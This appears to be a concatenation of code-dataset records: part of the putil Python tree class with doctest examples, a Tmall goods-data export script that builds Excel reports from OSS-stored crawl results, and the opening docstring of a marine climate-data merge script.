if isinstance(data, list) and data else
([] if isinstance(data, list) else [data])
)
def collapse_subtree(self, name, recursive=True):
r"""
Collapses a sub-tree; nodes that have a single child and no data are
combined with their child as a single tree node
:param name: Root of the sub-tree to collapse
:type name: :ref:`NodeName`
:param recursive: Flag that indicates whether the collapse operation
is performed on the whole sub-tree (True) or whether
it stops upon reaching the first node where the
collapsing condition is not satisfied (False)
:type recursive: boolean
.. [[[cog cog.out(exobj_tree.get_sphinx_autodoc()) ]]]
.. Auto-generated exceptions documentation for
.. putil.tree.Tree.collapse_subtree
:raises:
* RuntimeError (Argument \`name\` is not valid)
* RuntimeError (Argument \`recursive\` is not valid)
* RuntimeError (Node *[name]* not in tree)
.. [[[end]]]
Using the same example tree created in
:py:meth:`putil.tree.Tree.add_nodes`::
>>> from __future__ import print_function
>>> import docs.support.tree_example
>>> tobj = docs.support.tree_example.create_tree()
>>> print(tobj)
root
├branch1 (*)
│├leaf1
││└subleaf1 (*)
│└leaf2 (*)
│ └subleaf2
└branch2
>>> tobj.collapse_subtree('root.branch1')
>>> print(tobj)
root
├branch1 (*)
│├leaf1.subleaf1 (*)
│└leaf2 (*)
│ └subleaf2
└branch2
``root.branch1.leaf1`` is collapsed because it only has one child
(``root.branch1.leaf1.subleaf1``) and no data; ``root.branch1.leaf2``
is not collapsed because, although it has only one child
(``root.branch1.leaf2.subleaf2``), it has data associated with it
(:code:`'Hello world!'`)
"""
iname_ex = putil.exh.addai('name')
irec_ex = putil.exh.addai('recursive')
iname_ex(self._validate_node_name(name))
irec_ex(not isinstance(recursive, bool))
self._node_in_tree(name)
self._collapse_subtree(name, recursive)
def copy_subtree(self, source_node, dest_node):
r"""
Copies a sub-tree from one sub-node to another. Data is added if some
nodes of the source sub-tree exist in the destination sub-tree
:param source_node: Root node of the sub-tree to copy from
:type source_node: :ref:`NodeName`
:param dest_node: Root node of the sub-tree to copy to
:type dest_node: :ref:`NodeName`
.. [[[cog cog.out(exobj_tree.get_sphinx_autodoc()) ]]]
.. Auto-generated exceptions documentation for
.. putil.tree.Tree.copy_subtree
:raises:
* RuntimeError (Argument \`dest_node\` is not valid)
* RuntimeError (Argument \`source_node\` is not valid)
* RuntimeError (Illegal root in destination node)
* RuntimeError (Node *[source_node]* not in tree)
.. [[[end]]]
Using the same example tree created in
:py:meth:`putil.tree.Tree.add_nodes`::
>>> from __future__ import print_function
>>> import docs.support.tree_example
>>> tobj = docs.support.tree_example.create_tree()
>>> print(tobj)
root
├branch1 (*)
│├leaf1
││└subleaf1 (*)
│└leaf2 (*)
│ └subleaf2
└branch2
>>> tobj.copy_subtree('root.branch1', 'root.branch3')
>>> print(tobj)
root
├branch1 (*)
│├leaf1
││└subleaf1 (*)
│└leaf2 (*)
│ └subleaf2
├branch2
└branch3 (*)
├leaf1
│└subleaf1 (*)
└leaf2 (*)
└subleaf2
"""
src_ex = putil.exh.addai('source_node')
src_tree_ex = putil.exh.addex(
RuntimeError, 'Node *[source_node]* not in tree'
)
dest1_ex = putil.exh.addai('dest_node')
dest2_ex = putil.exh.addex(
RuntimeError, 'Illegal root in destination node'
)
src_ex(self._validate_node_name(source_node))
dest1_ex(self._validate_node_name(dest_node))
src_tree_ex(
source_node not in self._db, _F('source_node', source_node)
)
dest2_ex(not dest_node.startswith(self.root_name+self._node_separator))
for node in self._get_subtree(source_node):
self._db[node.replace(source_node, dest_node, 1)] = {
'parent':self._db[node]['parent'].replace(
source_node, dest_node, 1
),
'children':[
child.replace(source_node, dest_node, 1)
for child in self._db[node]['children']
],
'data':copy.deepcopy(self._db[node]['data'])}
self._create_intermediate_nodes(dest_node)
parent = self._node_separator.join(
dest_node.split(self._node_separator)[:-1]
)
self._db[dest_node]['parent'] = parent
self._db[parent]['children'] = sorted(
self._db[parent]['children']+[dest_node]
)
def delete_prefix(self, name):
r"""
Deletes hierarchy levels from all nodes in the tree
:param name: Prefix to delete
:type name: :ref:`NodeName`
.. [[[cog cog.out(exobj_tree.get_sphinx_autodoc()) ]]]
.. Auto-generated exceptions documentation for
.. putil.tree.Tree.delete_prefix
:raises:
* RuntimeError (Argument \`name\` is not a valid prefix)
* RuntimeError (Argument \`name\` is not valid)
.. [[[end]]]
For example:
>>> from __future__ import print_function
>>> import putil.tree
>>> tobj = putil.tree.Tree('/')
>>> tobj.add_nodes([
... {'name':'hello/world/root', 'data':[]},
... {'name':'hello/world/root/anode', 'data':7},
... {'name':'hello/world/root/bnode', 'data':8},
... {'name':'hello/world/root/cnode', 'data':False},
... {'name':'hello/world/root/bnode/anode', 'data':['a', 'b']},
... {'name':'hello/world/root/cnode/anode/leaf', 'data':True}
... ])
>>> tobj.collapse_subtree('hello', recursive=False)
>>> print(tobj)
hello/world/root
├anode (*)
├bnode (*)
│└anode (*)
└cnode (*)
└anode
└leaf (*)
>>> tobj.delete_prefix('hello/world')
>>> print(tobj)
root
├anode (*)
├bnode (*)
│└anode (*)
└cnode (*)
└anode
└leaf (*)
"""
name_ex = putil.exh.addai('name')
prefix_ex = putil.exh.addex(
RuntimeError, 'Argument `name` is not a valid prefix'
)
name_ex(self._validate_node_name(name))
prefix_ex(
((not self.root_name.startswith(name)) or (self.root_name == name))
)
self._delete_prefix(name)
def delete_subtree(self, nodes):
r"""
Deletes nodes (and their sub-trees) from the tree
:param nodes: Node(s) to delete
:type nodes: :ref:`NodeName` or list of :ref:`NodeName`
.. [[[cog cog.out(exobj_tree.get_sphinx_autodoc()) ]]]
.. Auto-generated exceptions documentation for
.. putil.tree.Tree.delete_subtree
:raises:
* RuntimeError (Argument \`nodes\` is not valid)
* RuntimeError (Node *[node_name]* not in tree)
.. [[[end]]]
Using the same example tree created in
:py:meth:`putil.tree.Tree.add_nodes`::
>>> from __future__ import print_function
>>> import docs.support.tree_example
>>> tobj = docs.support.tree_example.create_tree()
>>> print(tobj)
root
├branch1 (*)
│├leaf1
││└subleaf1 (*)
│└leaf2 (*)
│ └subleaf2
└branch2
>>> tobj.delete_subtree(['root.branch1.leaf1', 'root.branch2'])
>>> print(tobj)
root
└branch1 (*)
└leaf2 (*)
└subleaf2
"""
putil.exh.addai('nodes', self._validate_node_name(nodes))
self._delete_subtree(nodes)
def flatten_subtree(self, name):
r"""
Flattens sub-tree; nodes that have children and no data are merged
with each child
:param name: Ending hierarchy node whose sub-trees are to be
flattened
:type name: :ref:`NodeName`
.. [[[cog cog.out(exobj_tree.get_sphinx_autodoc()) ]]]
.. Auto-generated exceptions documentation for
.. putil.tree.Tree.flatten_subtree
:raises:
* RuntimeError (Argument \`name\` is not valid)
* RuntimeError (Node *[name]* not in tree)
.. [[[end]]]
Using the same example tree created in
:py:meth:`putil.tree.Tree.add_nodes`::
>>> from __future__ import print_function
>>> import docs.support.tree_example
>>> tobj = docs.support.tree_example.create_tree()
>>> tobj.add_nodes([
... {'name':'root.branch1.leaf1.subleaf2', 'data':[]},
... {'name':'root.branch2.leaf1', 'data':'lorem ipsum'},
... {'name':'root.branch2.leaf1.another_subleaf1', 'data':[]},
... {'name':'root.branch2.leaf1.another_subleaf2', 'data':[]}
... ])
>>> print(str(tobj))
root
├branch1 (*)
│├leaf1
││├subleaf1 (*)
││└subleaf2
│└leaf2 (*)
│ └subleaf2
└branch2
└leaf1 (*)
├another_subleaf1
└another_subleaf2
>>> tobj.flatten_subtree('root.branch1.leaf1')
>>> print(str(tobj))
root
├branch1 (*)
│├leaf1.subleaf1 (*)
│├leaf1.subleaf2
│└leaf2 (*)
│ └subleaf2
└branch2
└leaf1 (*)
├another_subleaf1
└another_subleaf2
>>> tobj.flatten_subtree('root.branch2.leaf1')
>>> print(str(tobj))
root
├branch1 (*)
│├leaf1.subleaf1 (*)
│├leaf1.subleaf2
│└leaf2 (*)
│ └subleaf2
└branch2
└leaf1 (*)
├another_subleaf1
└another_subleaf2
"""
putil.exh.addai('name', self._validate_node_name(name))
self._node_in_tree(name)
parent = self._db[name]['parent']
if (parent) and (not self._db[name]['data']):
children = self._db[name]['children']
for child in children:
self._db[child]['parent'] = parent
self._db[parent]['children'].remove(name)
self._db[parent]['children'] = sorted(
self._db[parent]['children']+children
)
del self._db[name]
def get_children(self, name):
r"""
Gets the children node names of a node
:param name: Parent node name
:type name: :ref:`NodeName`
:rtype: list of :ref:`NodeName`
.. [[[cog cog.out(exobj_tree.get_sphinx_autodoc()) ]]]
.. Auto-generated exceptions documentation for
.. putil.tree.Tree.get_children
:raises:
* RuntimeError (Argument \`name\` is not valid)
* RuntimeError (Node *[name]* not in tree)
.. [[[end]]]
"""
putil.exh.addai('name', self._validate_node_name(name))
self._node_in_tree(name)
return sorted(self._db[name]['children'])
def get_data(self, name):
r"""
Gets the data associated with a node
:param name: Node name
:type name: :ref:`NodeName`
:rtype: any type or list of objects of any type
.. [[[cog cog.out(exobj_tree.get_sphinx_autodoc()) ]]]
.. Auto-generated exceptions documentation for
.. putil.tree.Tree.get_data
:raises:
* RuntimeError (Argument \`name\` is not valid)
* RuntimeError (Node *[name]* not in tree)
.. [[[end]]]
"""
putil.exh.addai('name', self._validate_node_name(name))
self._node_in_tree(name)
return self._db[name]['data']
def get_leafs(self, name):
r"""
Gets the sub-tree leaf node(s)
:param name: Sub-tree root node name
:type name: :ref:`NodeName`
:rtype: list of :ref:`NodeName`
.. [[[cog cog.out(exobj_tree.get_sphinx_autodoc()) ]]]
.. Auto-generated exceptions documentation for
.. putil.tree.Tree.get_leafs
:raises:
* RuntimeError (Argument \`name\` is not valid)
* RuntimeError (Node *[name]* not in tree)
.. [[[end]]]
"""
putil.exh.addai('name', self._validate_node_name(name))
self._node_in_tree(name)
return [node for node in self._get_subtree(name) if self.is_leaf(node)]
def get_node(self, name):
r"""
Gets a tree node structure. The structure is a dictionary with the
following keys:
* **parent** (*NodeName*) Parent node name, :code:`''` if the
node is the root node
* **children** (*list of NodeName*) Children node names, an
empty list if node is a leaf
* **data** (*list*) Node data, an empty list if node contains no data
:param name: Node name
:type name: string
:rtype: dictionary
.. [[[cog cog.out(exobj_tree.get_sphinx_autodoc()) ]]]
.. Auto-generated exceptions documentation for
.. putil.tree.Tree.get_node
:raises:
* RuntimeError (Argument \`name\` is not valid)
* RuntimeError (Node *[name]* not in tree)
.. [[[end]]]
"""
putil.exh.addai('name', self._validate_node_name(name))
self._node_in_tree(name)
return self._db[name]
def get_node_children(self, name):
r"""
Gets the list of children structures of a node. See
:py:meth:`putil.tree.Tree.get_node` for details about the structure
:param name: Parent node name
:type name: :ref:`NodeName`
:rtype: list
.. [[[cog cog.out(exobj_tree.get_sphinx_autodoc()) ]]]
.. Auto-generated exceptions documentation for
.. putil.tree.Tree.get_node_children
:raises:
* RuntimeError (Argument \`name\` is not valid)
* RuntimeError (Node *[name]* not in tree)
.. [[[end]]]
"""
putil.exh.addai('name', self._validate_node_name(name))
self._node_in_tree(name)
return [self._db[child] for child in self._db[name]['children']]
def get_node_parent(self, name):
r"""
Gets the parent structure of a node. See
:py:meth:`putil.tree.Tree.get_node` for details about the structure
:param name: Child node name
:type name: :ref:`NodeName`
:rtype: dictionary
.. [[[cog cog.out(exobj_tree.get_sphinx_autodoc()) ]]]
.. Auto-generated exceptions documentation for
.. putil.tree.Tree.get_node_parent
:raises:
* RuntimeError (Argument \`name\` is not valid)
* RuntimeError (Node *[name]* not in tree)
.. [[[end]]]
"""
putil.exh.addai('name', self._validate_node_name(name))
self._node_in_tree(name)
return (
self._db[self._db[name]['parent']]
if not self.is_root(name) else
{}
)
def get_subtree(self, name):
r"""
Gets all node names in a sub-tree
:param name: Sub-tree root node name
:type name: :ref:`NodeName`
:rtype: list of :ref:`NodeName`
.. [[[cog cog.out(exobj_tree.get_sphinx_autodoc()) ]]]
.. Auto-generated exceptions documentation for
.. putil.tree.Tree.get_subtree
:raises:
* RuntimeError (Argument \`name\` is not valid)
* RuntimeError (Node *[name]* not in tree)
.. [[[end]]]
Using the same example tree created in
:py:meth:`putil.tree.Tree.add_nodes`::
>>> from __future__ import print_function
>>> import docs.support.tree_example, pprint
>>> tobj = docs.support.tree_example.create_tree()
>>> print(tobj)
root
├branch1 (*)
│├leaf1
││└subleaf1 (*)
│└leaf2 (*)
│ └subleaf2
└branch2
>>> pprint.pprint(tobj.get_subtree('root.branch1'))
['root.branch1',
'root.branch1.leaf1',
'root.branch1.leaf1.subleaf1',
'root.branch1.leaf2',
'root.branch1.leaf2.subleaf2']
"""
putil.exh.addai('name', self._validate_node_name(name))
self._node_in_tree(name)
return self._get_subtree(name)
def is_root(self, name):
r"""
Tests if a node is the root node (node with no ancestors)
:param name: Node name
:type name: :ref:`NodeName`
:rtype: boolean
.. [[[cog cog.out(exobj_tree.get_sphinx_autodoc()) ]]]
.. Auto-generated exceptions documentation for putil.tree.Tree.is_root
:raises:
* RuntimeError (Argument \`name\` is not valid)
* RuntimeError (Node *[name]* not in tree)
.. [[[end]]]
"""
putil.exh.addai('name', self._validate_node_name(name))
self._node_in_tree(name)
return not self._db[name]['parent']
def in_tree(self, name):
r"""
Tests if a node is in the tree
:param name: Node name to search for
:type name: :ref:`NodeName`
:rtype: boolean
.. [[[cog cog.out(exobj_tree.get_sphinx_autodoc()) ]]]
.. Auto-generated exceptions documentation for putil.tree.Tree.in_tree
:raises: RuntimeError (Argument \`name\` is not valid)
.. [[[end]]]
"""
putil.exh.addai('name', self._validate_node_name(name))
return name in self._db
def is_leaf(self, name):
r"""
Tests if a node is a leaf node (node with no children)
:param name: Node name
:type name: :ref:`NodeName`
:rtype: boolean
.. [[[cog cog.out(exobj_tree.get_sphinx_autodoc()) ]]]
.. Auto-generated exceptions documentation for putil.tree.Tree.is_leaf
:raises:
* RuntimeError (Argument \`name\` is not valid)
* RuntimeError (Node *[name]* not in tree)
.. [[[end]]]
"""
putil.exh.addai('name', self._validate_node_name(name))
self._node_in_tree(name)
return not self._db[name]['children']
def make_root(self, name):
r"""
Makes a sub-node the root node of the tree. All nodes not belonging to
the sub-tree are deleted
:param name: New root node name
:type name: :ref:`NodeName`
.. [[[cog cog.out(exobj_tree.get_sphinx_autodoc()) ]]]
.. Auto-generated exceptions documentation for
.. putil.tree.Tree.make_root
:raises:
* RuntimeError (Argument \`name\` is not valid)
* RuntimeError (Node *[name]* not in tree)
.. [[[end]]]
Using the same example tree created in
:py:meth:`putil.tree.Tree.add_nodes`::
>>> from __future__ import print_function
>>> import docs.support.tree_example
>>> tobj = docs.support.tree_example.create_tree()
>>> print(tobj)
root
├branch1 (*)
│├leaf1
││└subleaf1 (*)
│└leaf2 (*)
│ └subleaf2
└branch2
>>> tobj.make_root('root.branch1')
>>> print(tobj)
root.branch1 (*)
├leaf1
│└subleaf1 (*)
└leaf2 (*)
└subleaf2
"""
putil.exh.addai('name', self._validate_node_name(name))
if (name != self.root_name) and (self._node_in_tree(name)):
for key in [node for node in self.nodes if node.find(name) != 0]:
del self._db[key]
self._db[name]['parent'] = ''
self._root = name
self._root_hierarchy_length = len(
self.root_name.split(self._node_separator)
)
def print_node(self, name):
r"""
Prints node information (parent, children and data)
:param name: Node name
:type name: :ref:`NodeName`
.. [[[cog cog.out(exobj_tree.get_sphinx_autodoc()) ]]]
.. Auto-generated exceptions documentation for
.. putil.tree.Tree.print_node
:raises:
* RuntimeError (Argument \`name\` is not valid)
* RuntimeError (Node *[name]* not in tree)
.. [[[end]]]
Using the same example tree created in
:py:meth:`putil.tree.Tree.add_nodes`::
>>> from __future__ import print_function
>>> import docs.support.tree_example
>>> tobj = docs.support.tree_example.create_tree()
>>> print(tobj)
root
├branch1 (*)
│├leaf1
││└subleaf1 (*)
│└leaf2 (*)
│ └subleaf2
└branch2
>>> print(tobj.print_node('root.branch1'))
Name: root.branch1
Parent: root
Children: leaf1, leaf2
Data: [5, 7]
"""
putil.exh.addai('name', self._validate_node_name(name))
self._node_in_tree(name)
node = self._db[name]
children = [
self._split_node_name(child)[-1]
for child in node['children']
] if node['children'] else node['children']
data = (node['data'][0]
if node['data'] and (len(node['data']) == 1) else
node['data'])
return (
'Name: {node_name}\n'
'Parent: {parent_name}\n'
'Children: {children_list}\n'
'Data: {node_data}'.format(
node_name=name,
parent_name=node['parent'] if node['parent'] else None,
children_list=', '.join(children) if children else None,
node_data=data if data else None
)
)
def rename_node(self, name, new_name):
r"""
Renames a tree node. It is typical to have a root node name with more
than one hierarchy level after using
:py:meth:`putil.tree.Tree.make_root`. In this instance the root node
*can* be renamed as long as the new root name has the same number of
hierarchy levels as, or fewer than, the existing root name
:param name: Node name to rename
:type name: :ref:`NodeName`
.. [[[cog cog.out(exobj_tree.get_sphinx_autodoc()) ]]]
.. Auto-generated exceptions documentation for
.. putil.tree.Tree.rename_node
:raises:
* RuntimeError (Argument \`name\` is not valid)
* RuntimeError (Argument \`new_name\` has an illegal root node)
* RuntimeError (Argument \`new_name\` is an illegal root node name)
* RuntimeError (Argument \`new_name\` is not valid)
* RuntimeError (Node *[name]* not in tree)
* RuntimeError (Node *[new_name]* already exists)
.. [[[end]]]
Using the same example tree created in
:py:meth:`putil.tree.Tree.add_nodes`::
>>> from __future__ import print_function
>>> import docs.support.tree_example
>>> tobj = docs.support.tree_example.create_tree()
>>> print(tobj)
root
├branch1 (*)
│├leaf1
││└subleaf1 (*)
│└leaf2 (*)
│ └subleaf2
└branch2
>>> tobj.rename_node(
... 'root.branch1.leaf1',
... 'root.branch1.mapleleaf1'
... )
>>> print(tobj)
root
├branch1 (*)
│├leaf2 (*)
││└subleaf2
│└mapleleaf1
│ └subleaf1 (*)
└branch2
"""
name_ex = putil.exh.addai('name')
new_name_ex = putil.exh.addai('new_name')
exists_ex = putil.exh.addex(
RuntimeError, 'Node *[new_name]* already exists'
)
new_name2_ex = putil.exh.addex(
RuntimeError, 'Argument `new_name` has an illegal root node'
)
root_ex = putil.exh.addex(
RuntimeError, 'Argument `new_name` is an illegal root node name'
)
name_ex(self._validate_node_name(name))
new_name_ex(self._validate_node_name(new_name))
self._node_in_tree(name)
exists_ex(
self.in_tree(new_name) and (name != self.root_name),
_F('new_name', new_name)
)
sep = self._node_separator
new_name2_ex(
(name.split(sep)[:-1] != new_name.split(sep)[:-1]) and
(name != self.root_name)
)
old_hierarchy_length = len(name.split(self._node_separator))
new_hierarchy_length = len(new_name.split(self._node_separator))
root_ex(
(name == self.root_name) and
(old_hierarchy_length < new_hierarchy_length)
)
self._rename_node(name, new_name)
def search_tree(self, name):
r"""
Searches tree for all nodes with a specific name
:param name: Node name to search for
:type name: :ref:`NodeName`
.. [[[cog cog.out(exobj_tree.get_sphinx_autodoc()) ]]]
.. Auto-generated exceptions documentation for
.. putil.tree.Tree.search_tree
:raises: RuntimeError (Argument \`name\` is not valid)
.. [[[end]]]
For example:
>>> from __future__ import print_function
>>> import pprint, putil.tree
>>> tobj = putil.tree.Tree('/')
>>> tobj.add_nodes([
... {'name':'root', 'data':[]},
... {'name':'root/anode', 'data':7},
... {'name':'root/bnode', 'data':[]},
... {'name':'root/cnode', 'data':[]},
... {'name':'root/bnode/anode', 'data':['a', 'b', 'c']},
... {'name':'root/cnode/anode/leaf', 'data':True}
... ])
>>> print(tobj)
root
├anode (*)
├bnode
│└anode (*)
└cnode
└anode
└leaf (*)
>>> pprint.pprint(tobj.search_tree('anode'), width=40)
['root/anode',
'root/bnode/anode',
'root/cnode/anode',
'root/cnode/anode/leaf']
"""
putil.exh.addai('name', self._validate_node_name(name))
return self._search_tree(name)
# Managed attributes
nodes = property(_get_nodes, doc='Tree nodes')
"""
Gets the names of all tree nodes, :code:`None` if the tree is empty
:rtype: list of :ref:`NodeName` or None
"""
node_separator = property(_get_node_separator, doc='Node separator')
"""
Gets the node separator character
:rtype: string
"""
root_name = property(_get_root_name, doc='Tree root node name')
"""
Gets the tree root node name, :code:`None` if the
:py:class:`putil.tree.Tree` object has no nodes
:rtype: :ref:`NodeName` or None
"""
root_node = property(_get_root_node, doc='Tree root node')
"""
Gets the tree root node structure or :code:`None`
if :py:class:`putil.tree.Tree` object has no nodes. See
:py:meth:`putil.tree.Tree.get_node` for details about returned dictionary
:rtype: dictionary or None
"""
|
StarcoderdataPython
|
6680331
|
<gh_stars>1-10
import json
from crawl_taobao_goods_migrate.config import CRAWL_SHOPS
from pyspider.helper.date import Date
from pyspider.helper.excel import Excel
from pyspider.libs.oss import oss
from pyspider.libs.sls import sls
class TmallOss:
"""
Tmall goods data stored in OSS, exported to an Excel report
"""
def __init__(self, start_time: str, end_time: str):
"""
:param start_time: eg. "2021-03-01"
:param end_time: eg. "2021-04-01"
"""
# statistics window
self.statistics_start_time = start_time
self.statistics_end_time = end_time
# latest aggregated statistics for each goods item
self.save_sku = {}
"""
Statistics saved per month, eg:
month_save_data = {
"2021-03": {
"monthly_sales_count": 25, # sales in the period
"whole_star": 25, # total favourites as of that month (favourite counts are cumulative)
},
"2021-04": {
"monthly_sales_count": 25, # sales in the period
"whole_star": 25, # total favourites as of that month (favourite counts are cumulative)
}
}
"""
self.month_save_data = {}
self.oss_data_start_date = start_time
self.oss_data_end_date = end_time
def entry(self):
for shop_id, shop_url in CRAWL_SHOPS.items():
self.save_sku = {}
self.month_save_data = {}
print("Start exporting goods data for shop: {}".format(shop_id))
# process the data (the original comment said "multi-threaded", but this loop runs sequentially)
excel_name = "{shop_id}-{date}".format(shop_id=shop_id, date=Date().now().format(full=False))
begin_date = Date(self.oss_data_start_date)
while True:
path = "crawler/goods/tmall/{shop_id}/{start_date}".format(
shop_id=shop_id, start_date=begin_date.format(full=False).replace("-", "/") + "/")
next_token = ''
excel = self.get_excel()
while True:
files, next_token = oss.list_objects(prefix=path, continuation_token=next_token, max_keys=1000)
print("files count:{}".format(len(files)))
for file in files:
try:
file_name = file.key
print(file_name)
file_obj = oss.get_object(file_name).resp.response.content
data = file_obj
json_data = json.loads(data)
self.value_to_excel(json_data)
except Exception as e:
print("err: {}".format(e.args))
if not next_token:
break
if begin_date.format(full=False) == self.oss_data_end_date:
break
begin_date.plus_days(1)
# export the collected data
for item_key, item_value in self.save_sku.items():
excel.add_data(item_value)
excel.export_file(file_name=excel_name)
print("Finished exporting goods data for shop: {}".format(shop_id))
def sls_entry(self):
"""
Fetch Tmall goods data from Aliyun SLS
:return:
"""
from_time = Date.now().plus_months(-1).timestamp()
to_time = Date.now().timestamp()
sls.get_log_all("craw-robot", "tmall-goods", from_time, to_time)
def value_to_excel(self, data):
"""
Map the raw crawled data onto the fields expected by the ERP upload
:param data: dict of crawled goods fields
:return:
"""
# goods ID
goods_id = data.get('goods_id', '')
# latest saved statistics for this SKU
save_sku_goods = self.save_sku.get(goods_id, {})
sku_update_time = data.get('update_time', '1970-01-01 08:00:01')
# list (strike-through) price
price = float(data.get('price', 0))
# highest price in the statistics window - defaults to the list price
period_highest_price = price
# lowest price in the statistics window - defaults to the list price
period_lowest_price = price
# all-time lowest price - defaults to the list price
history_lowest_price_in = price
# shelf (listing) time
added_time = save_sku_goods.get("added_time", "")
if save_sku_goods:
# within the statistics window
if Date(self.statistics_start_time).to_day_start().timestamp() <= Date(sku_update_time).to_day_start() \
.timestamp() <= Date(self.statistics_end_time).to_day_start().timestamp():
# highest price in the window
if price > save_sku_goods.get("period_highest_price", 0):
period_highest_price = price
# lowest price in the window
if price < save_sku_goods.get("period_lowest_price", 0):
period_lowest_price = price
# all-time lowest price
if price < save_sku_goods.get("history_lowest_price_in", 0):
history_lowest_price_in = price
else:
if price < save_sku_goods.get("history_lowest_price_in", 0):
history_lowest_price_in = price
else:
added_time = data.get('update_time', '')
# sales in the current period
monthly_sales_count = data.get('sales_count_monthly', 0)
if isinstance(monthly_sales_count, str):
if "100+" in monthly_sales_count:
monthly_sales = 100 * period_highest_price
monthly_sales_count = 100
elif "200+" in monthly_sales_count:
monthly_sales = 200 * period_highest_price
monthly_sales_count = 200
elif "400+" in monthly_sales_count:
monthly_sales = 400 * period_highest_price
monthly_sales_count = 400
else:
monthly_sales = int(monthly_sales_count) * period_highest_price
else:
monthly_sales = int(monthly_sales_count) * period_highest_price
# total favourites
whole_star = data.get('star_number', 0)
# statistics keyed by month
month_date_str = Date(data.get('update_time', '')).format(full=False)[:-3]
self.month_save_data[month_date_str] = {
"monthly_sales_count": monthly_sales_count, # sales in the period
"whole_star": whole_star, # total favourites as of that month (favourite counts are cumulative)
}
# total sales count across all recorded months
total_sales_count = sum(
[int(data_item.get("monthly_sales_count", 0)) for date_str, data_item in self.month_save_data.items()])
# favourites gained in the current period
now_date_str = Date().now().format(full=False)[:-3]
last_month_date_str = Date().now().plus_months(-1).format(full=False)[:-3]
monthly_star = self.month_save_data.get(now_date_str, {}).get("whole_star", 0) - self.month_save_data.get(
last_month_date_str, {}).get("whole_star", 0)
color = ""
for item_sku in data.get("sku", {}):
if item_sku.get("stock", 0) > 0:
color = item_sku.get("color", "")
barcode = ""
year_season = ""
material = ""
sales_channel_type = ""
suitable_age = ""
my_brand = ""
goods_attr_list = data.get("goods_attr_list", [])
# attribute keys stay in Chinese because they must match the crawled attribute text
for goods in goods_attr_list:
item_str = goods
if "货号" in item_str:  # "货号" = article number
barcode = item_str.split(':', 1)[1].strip()
elif "年份季节" in item_str:  # "年份季节" = year/season
year_season = item_str.split(':', 1)[1].strip()
elif "材质成分" in item_str:  # "材质成分" = material composition
material = item_str.split(':', 1)[1].strip()
elif "销售渠道类型" in item_str:  # "销售渠道类型" = sales channel type
sales_channel_type = item_str.split(':', 1)[1].strip()
elif "适用年龄" in item_str:  # "适用年龄" = applicable age range
suitable_age = item_str.split(':', 1)[1].strip()
elif "品牌" in item_str:  # "品牌" = brand
my_brand = item_str.split(':', 1)[1].strip()
the_list = {
'goods_id': goods_id,
'title': data.get('goods_name', ''),
'main_image': data.get('main_img', ''),
'origin_price': data.get('original_price', 0),
'price': price,
'period_highest_price': period_highest_price,
'period_lowest_price': period_lowest_price,
'history_lowest_price_in': history_lowest_price_in,
'category': data.get('category', ''),
'goods_url': data.get('goods_url', ''),
'added_time': added_time,
'industry': data.get('industry', ''),
'shop_name': data.get('shop_name', ''),
'statistics_time': "{} - {}".format(self.statistics_start_time, self.statistics_end_time),
'total_sales_count': total_sales_count,
'monthly_sales_count': monthly_sales_count,
'monthly_sales': monthly_sales,
'monthly_star': monthly_star,
'whole_star': whole_star,
'whole_comments_count': data.get('comments_count', ''),
'stock': data.get('stock', ''),
'color': color,
'barcode': barcode,
'brand': my_brand,
'year_season': year_season,
'material': material,
'sales_channel_type': sales_channel_type,
'suitable_age': suitable_age,
'update_time': data.get('update_time', ''),
}
self.save_sku[goods_id] = the_list
def get_excel(self):
"""
Define the spreadsheet headers and field names
:return:
"""
# Column titles stay in Chinese to match the downstream ERP import template
return Excel() \
.add_header('goods_id', '商品ID') \
.add_header('title', '商品标题') \
.add_header('main_image', '商品主图链接') \
.add_header('origin_price', '商品价格') \
.add_header('price', '商品划线价') \
.add_header('period_highest_price', '统计时间最高价') \
.add_header('period_lowest_price', '统计时间最低价') \
.add_header('history_lowest_price_in', '历史最低价') \
.add_header('category', '商品类目') \
.add_header('goods_url', '商品链接') \
.add_header('added_time', '上架时间') \
.add_header('industry', '所属行业') \
.add_header('shop_name', '所属店铺') \
.add_header('statistics_time', '统计时间') \
.add_header('total_sales_count', '总销量') \
.add_header('monthly_sales_count', '本期销量') \
.add_header('monthly_sales', '本期销售额(元)') \
.add_header('monthly_star', '本期收藏') \
.add_header('whole_star', '总收藏') \
.add_header('whole_comments_count', '总评价') \
.add_header('stock', '库存') \
.add_header('color', '颜色') \
.add_header('barcode', '货号') \
.add_header('brand', '品牌') \
.add_header('year_season', '年份季节') \
.add_header('material', '材质成分') \
.add_header('sales_channel_type', '销售渠道类型') \
.add_header('suitable_age', '适用年龄') \
.add_header('update_time', '数据更新时间')
if __name__ == '__main__':
TmallOss("2021-04-01", "2021-04-01").entry()
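# --- Hedged sketch (illustrative addition, not part of the crawler) ---
# Tmall reports monthly sales either as an int or as a capped string such as
# "100+"; this standalone helper mirrors the branch logic in value_to_excel.
# The function name is hypothetical.
def parse_monthly_sales(raw, unit_price):
    caps = {"100+": 100, "200+": 200, "400+": 400}
    if isinstance(raw, str):
        for token, count in caps.items():
            if token in raw:
                return count, count * unit_price
    count = int(raw)
    return count, count * unit_price

# parse_monthly_sales("200+", 19.9) -> (200, 3980.0)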
|
StarcoderdataPython
|
11290850
|
#!/usr/local/sci/bin/python2.7
#*****************************
#
# merge _day and _night netCDF files
#
#
#************************************************************************
'''
Author: <NAME>
Created: March 2016
Last update: 12 April 2016
Location: /project/hadobs2/hadisdh/marine/PROGS/Build
-----------------------
CODE PURPOSE AND OUTPUT
-----------------------
Merge outputs from _day and _night to create _both. An alternative approach to the _all files
For uncertainty this assumes correlation of r=1 for SLR, SCN, HGT and C and no correlation (r=0) for R, M and TOT
-----------------------
LIST OF MODULES
-----------------------
utils.py
-----------------------
DATA
-----------------------
Input data stored in:
/project/hadobs2/hadisdh/marine/ICOADS.3.0.0/GRIDSOBSclim2noQC/
/project/hadobs2/hadisdh/marine/ICOADS.3.0.0/GRIDSERAclimNBC/
/project/hadobs2/hadisdh/marine/ICOADS.3.0.0/GRIDSOBSclim1NBC/
/project/hadobs2/hadisdh/marine/ICOADS.3.0.0/GRIDSOBSclim2NBC/
/project/hadobs2/hadisdh/marine/ICOADS.3.0.0/GRIDSOBSclim2BCtotal/
/project/hadobs2/hadisdh/marine/ICOADS.3.0.0/GRIDSOBSclim2BChgt/
/project/hadobs2/hadisdh/marine/ICOADS.3.0.0/GRIDSOBSclim2BCinstr/
/project/hadobs2/hadisdh/marine/ICOADS.3.0.0/GRIDSOBSclim2BCtotalship/
-----------------------
HOW TO RUN THE CODE
-----------------------
